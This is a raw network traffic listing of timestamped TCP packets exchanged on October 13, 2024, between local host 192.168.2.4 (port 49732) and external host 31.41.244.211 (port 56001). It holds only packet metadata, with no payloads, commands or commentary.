Oct 13, 2024 18:16:30.908227921 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.908241987 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.908256054 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.908273935 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.908291101 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.908294916 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.908309937 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.908371925 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.908425093 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.908438921 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.908453941 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.908468008 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.908482075 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.908509970 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.908562899 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.908577919 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.908659935 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.908674002 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.908688068 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.908690929 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.908701897 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.908716917 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.908720016 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.908730030 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.908739090 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.908746004 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.908756018 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.908979893 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.911710978 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.911734104 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.911748886 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.911792040 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.911851883 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.911865950 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.911885977 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.911900043 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.911912918 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.911921024 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.911946058 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.911951065 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.911961079 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.911971092 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.911976099 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.912010908 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.912077904 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.912091970 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.912106037 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.912131071 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.912139893 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.912146091 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.912167072 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.912172079 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.912190914 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.912312031 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.912324905 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.912338972 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.912374973 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.912396908 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.912409067 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.912422895 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.912435055 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.912436962 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.912452936 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.912491083 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.912504911 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.912523031 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.912580967 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.038883924 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.038908958 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.038923025 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.038978100 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.039007902 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039036989 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039068937 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.039171934 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039186954 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039201975 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039220095 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039242029 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039251089 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.039285898 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.039315939 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039328098 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039340973 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039355993 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039369106 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039374113 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.039397001 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039413929 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039417028 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.039437056 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039444923 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.039469957 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039571047 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.039577961 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039592028 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039604902 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039618969 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039647102 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.039694071 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039707899 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039721012 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039726973 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.039735079 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039747953 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.039750099 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039767027 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.039807081 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.039844990 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039859056 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039880037 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039892912 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.039906979 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.039961100 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.039992094 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040004969 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040018082 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040031910 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040050030 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.040117025 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.040186882 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040199995 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040214062 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040227890 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040251017 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040260077 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.040263891 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040278912 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040283918 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.040297031 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040299892 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.040312052 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040335894 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.040508032 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040524960 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040543079 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040555954 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040571928 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040585995 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040592909 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.040601015 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040612936 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.040616989 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040705919 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.040726900 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040740967 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040754080 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040767908 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040781975 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040795088 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.040874004 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040879965 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.040888071 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040901899 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040925026 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040930986 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.040941954 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040960073 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.040975094 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.041057110 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.041152954 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.041166067 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.041179895 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.041193008 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.041205883 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.041208029 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.041220903 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.041229963 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.041234970 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.041249037 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.041285992 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.041312933 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.041316032 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.041327953 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.041357040 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.041578054 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.041591883 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.041605949 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.041620016 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.041625023 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.041635036 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.041645050 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.041656017 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.041670084 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.041682959 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.041683912 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.041697025 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.041718006 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.041721106 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.041732073 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.041738033 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.041821957 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.041841984 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.041858912 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.041877031 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.041889906 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.041919947 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.041985035 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.051913977 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.051980019 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.051995993 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.052048922 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.052114964 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.052128077 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.052141905 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.052155972 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.052170992 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.052210093 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.052220106 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.052242041 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.052254915 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.052268982 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.052284002 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.052290916 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.052320004 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.052350998 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.052361965 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.052365065 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.052432060 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.052433968 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.052453041 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.052469015 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.052484035 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.052575111 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.052576065 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.052720070 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.052740097 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.052756071 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.052768946 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.052782059 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.052795887 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.052799940 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.052810907 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.052844048 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.052844048 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.098123074 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.132694006 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.132708073 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.132721901 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.132735014 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.132749081 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.132807016 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.132813931 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.132821083 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.132834911 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.132848978 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.132863998 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.132864952 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.132894993 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.132932901 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.132946014 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.132957935 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.132965088 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.132980108 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.133048058 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.133048058 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.133152008 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.133164883 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.133178949 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.133192062 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.133205891 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.133219004 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.133233070 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.133239031 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.133239031 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.133246899 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.133261919 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.133261919 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.133275986 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.133290052 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.133304119 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.133318901 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.133333921 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.133501053 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.133651018 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.133665085 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.133677959 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.133692026 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.133704901 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.133718967 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.133723021 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.133733988 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.133748055 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.133748055 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.133748055 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.133776903 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.133861065 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.133874893 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.133894920 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.133924007 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.133951902 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.167366028 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.167524099 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.167537928 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.167560101 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.167572975 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.167587996 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.167602062 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.167609930 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.167617083 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.167653084 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.167706013 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.167720079 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.167738914 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.167738914 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.167752981 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.167767048 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.167771101 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.167866945 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.167972088 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.167985916 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168000937 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168015003 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168029070 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168030977 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.168042898 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168052912 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.168057919 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168068886 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.168071985 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168086052 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168101072 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168112993 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.168132067 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.168314934 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168329954 CEST	56001	49732	31.41.244.211	192.168.2.4
